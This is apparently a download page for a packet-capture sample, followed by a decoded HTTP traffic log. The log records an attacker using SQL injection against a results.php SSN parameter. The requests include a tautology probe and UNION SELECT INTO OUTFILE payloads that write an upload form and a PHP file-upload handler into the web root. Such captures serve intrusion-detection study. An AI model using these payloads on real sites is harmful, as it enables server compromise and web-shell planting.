Text Example

XSS SQLi Injection Web Attack PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 21
    Date added: May 24, 2019 12:02 am Added by: admin File size: 5 MB Downloads: 13

References:

https://www.reverse.it/sample/69e48eb82ce7387d65cc1a82c5a6a170dc6121d479736b1dd33358d09c483617/?environmentId=5

2016-04-23 14:02:05.230289 IP 84.11.146.55.1458 > 192.168.1.124.80: Flags [P.], seq 1:292, ack 1, win 258, length 291: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

2016-04-23 14:02:05.247929 IP 192.168.1.124.80 > 84.11.146.55.1458: Flags [.], ack 283, win 159, length 0


2016-04-23 14:02:05.372530 IP 84.11.146.55.1460 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
2016-04-23 14:02:05.372850 IP 84.11.146.55.1460 > 192.168.1.124.80: Flags [P.], seq 1:306, ack 1, win 258, length 305: HTTP: GET /logo.png HTTP/1.1
GET /logo.png HTTP/1.1
Connection: close
Accept: image/png, image/*;q=0.8, */*;q=0.5
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

2016-04-23 14:02:05.378288 IP 192.168.1.124.80 > 84.11.146.55.1460: Flags [.], ack 293, win 159, length 0

2016-04-23 14:02:38.156367 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij

2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0

2016-04-23 14:03:09.895806 IP 84.11.146.55.1491 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
2016-04-23 14:03:09.896189 IP 84.11.146.55.1491 > 192.168.1.124.80: Flags [P.], seq 1:909, ack 1, win 258, length 908: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3Chtml%3E%3Cbody%3E%3Cform+action%3D%22WSO_upload.php%22+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E++++Select+file+to+upload%3A++++%3Cinput+type%3D%22file%22+name%3D%22fileToUpload%22+id%3D%22fileToUpload%22%3E++++%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+name%3D%22submit%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_submission.php HTTP/1.1
GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3Chtml%3E%3Cbody%3E%3Cform+action%3D%22WSO_upload.php%22+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E++++Select+file+to+upload%3A++++%3Cinput+type%3D%22file%22+name%3D%22fileToUpload%22+id%3D%22fileToUpload%22%3E++++%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+name%3D%22submit%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_submission.php HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

2016-04-23 14:03:37.804113 IP 84.11.146.55.1505 > 209.10.120.28.80: Flags [P.], seq 1:220, ack 1, win 260, length 219: HTTP: POST /e.aspx HTTP/1.1
POST /e.aspx HTTP/1.1
Accept: */*
Host: mmi.cloud.avg.com
Content-Length: 87
Content-Type: application/x-www-form-urlencoded

M=66994e392ddb47cda1e0b14bd41b397c&P1=784&P2=302&D=512&C=1&UID=2147483647&Submit=Submit
2016-04-23 14:03:37.816560 IP 157.56.106.184.3544 > 84.11.146.55.63092: UDP, length 109
2016-04-23 14:03:37.838175 IP 209.10.120.28.80 > 84.11.146.55.1505: Flags [FP.], seq 1:424, ack 220, win 512, length 423: HTTP: HTTP/1.1 200 OK

2016-04-23 14:03:38.303665 IP 84.11.146.55.1506 > 209.10.120.30.80: Flags [P.], seq 1:450, ack 1, win 260, length 449: HTTP: POST /mw.aspx HTTP/1.1
POST /mw.aspx HTTP/1.1
Accept: */*
Host: prev.cloud.avg.com
Content-Length: 314
Content-Type: application/x-www-form-urlencoded

M=66994e392ddb47cda1e0b14bd41b397c&UID=2147483647&&FT=20160423T174119-0500&LT=20160423T174119-0500&T=1&A=9&C=1&S=4&X=%40EID_Id_trj%7c%25name%25%3dPSW.Generic8.ISF%7c%25idn%25%3d0b28d9f766754000%7c&U=c%3a%5cUsers%5cAlex%5cDownloads%5c000&H=63cb18cb36dc5d531ab5f8356ac542cb&Z=25927f6eb3a47e8eeb08129652188903abe39bd0
2016-04-23 14:03:38.338257 IP 209.10.120.30.80 > 84.11.146.55.1506: Flags [FP.], seq 1:190, ack 450, win 512, length 189: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Cache-Control: private

2016-04-23 14:03:40.593861 IP 84.11.146.55.1508 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
2016-04-23 14:03:40.594333 IP 84.11.146.55.1508 > 192.168.1.124.80: Flags [.], seq 1:961, ack 1, win 258, length 960: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3C%3Fphp+%24target_dir+%3D+%22uploads%2F%22%3B+%24target_file+%3D+%24target_dir+.+basename%28%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29%3B+if+%28move_uploaded_file%28%24_FILES%5B%22fileToUpload%22%5D%5B%22tmp_name%22%5D%2C+%24target_file%29%29+%7B+echo+%22The+file+%22.+basename%28+%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29.+%22+has+been+uploaded.%22%3B%7D+else+%7B+echo+%22Sorry%2C+there+was+an+error+uploading+your+file.%22%3B+%7D%3F%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_upload.php HTTP/1.1
GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3C%3Fphp+%24target_dir+%3D+%22uploads%2F%22%3B+%24target_file+%3D+%24target_dir+.+basename%28%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29%3B+if+%28move_uploaded_file%28%24_FILES%5B%22fileToUpload%22%5D%5B%22tmp_name%22%5D%2C+%24target_file%29%29+%7B+echo+%22The+file+%22.+basename%28+%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29.+%22+has+been+uploaded.%22%3B%7D+else+%7B+echo+%22Sorry%2C+there+was+an+error+uploading+your+file.%22%3B+%7D%3F%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_upload.php HTTP/1.1
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: htt
2016-04-23 14:03:40.594350 IP 84.11.146.55.1508 > 192.168.1.124.80: Flags [P.], seq 961:1002, ack 1, win 258, length 41: HTTP
p://192.168.1.124/
Connection: close

2016-04-23 14:09:41.620897 IP6 2601:240:c000:5ff0:7087:ce7f:bcb9:f90.1676 > 2001:559:19:303::17d9:8a13.80: Flags [P.], seq 192:357, ack 16836, win 258, length 165: HTTP: GET /pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/16.0.6769.2017/i321033.cab HTTP/1.1
GET /pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/16.0.6769.2017/i321033.cab HTTP/1.1
Connection: Keep-Alive
Host: officecdn.microsoft.com.edgesuite.net

2016-04-23 14:09:41.629096 IP 104.214.35.244.443 > 84.11.146.55.1673: Flags [.], ack 1955, win 513, length 0
2016-04-23 14:09:41.631614 IP6 2001:559:19:303::17d9:8a13.80 > 2601:240:c000:5ff0:7087:ce7f:bcb9:f90.1676: Flags [.], seq 16836:18276, ack 357, win 967, length 1440: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 04 Apr 2016 05:52:11 GMT

2016-04-23 14:09:44.828961 IP 84.11.146.55.1677 > 207.46.101.29.80: Flags [.], ack 1, win 256, length 0
2016-04-23 14:09:44.829520 IP 84.11.146.55.1677 > 207.46.101.29.80: Flags [P.], seq 1:123, ack 1, win 256, length 122: HTTP: POST /UploadData.aspx HTTP/1.1
POST /UploadData.aspx HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
Content-Length: 15234
Host: ds.ssw.live.com
